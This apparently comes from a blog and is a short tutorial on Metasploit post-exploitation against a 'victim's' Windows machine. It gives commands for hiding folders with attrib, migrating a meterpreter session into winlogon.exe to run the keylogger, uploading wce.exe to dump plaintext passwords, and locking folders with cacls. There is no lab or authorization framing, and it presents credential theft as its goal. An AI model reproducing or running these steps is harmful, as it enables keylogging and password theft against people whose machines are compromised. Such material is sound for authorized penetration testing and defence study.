Metasploit Post Exploitation Methods

(A)Hide File in victim `s P.C:-

After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.

attrib +h +r +s drivename:/Foldername

For example you want to hide folder name “songs” in F drive then just type following command in your terminal.


attrib +h +r +s F:/songs

For unhidden file attrib -h -r -s F:/songs

(B)Get passwords of remote windows P.C:-

After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.

In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.

Type following command in your terminal.

migrate 600

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

(C)Remote Windows password in plain text :-

Type following command in your meterpreter session.

Upload /pentest/passwords/wce/wce.exe


wce.exe -w

(D)Lock Folder in Remote P.C. :-

After getting meterpreter  session type following command.

Cacls (Folder Name) /e /p everyone:n

This will lock your folder.

For unlock

Cacls (Folder Name) /e /p everyone:f

Here is more method of post exploitation.

No comments: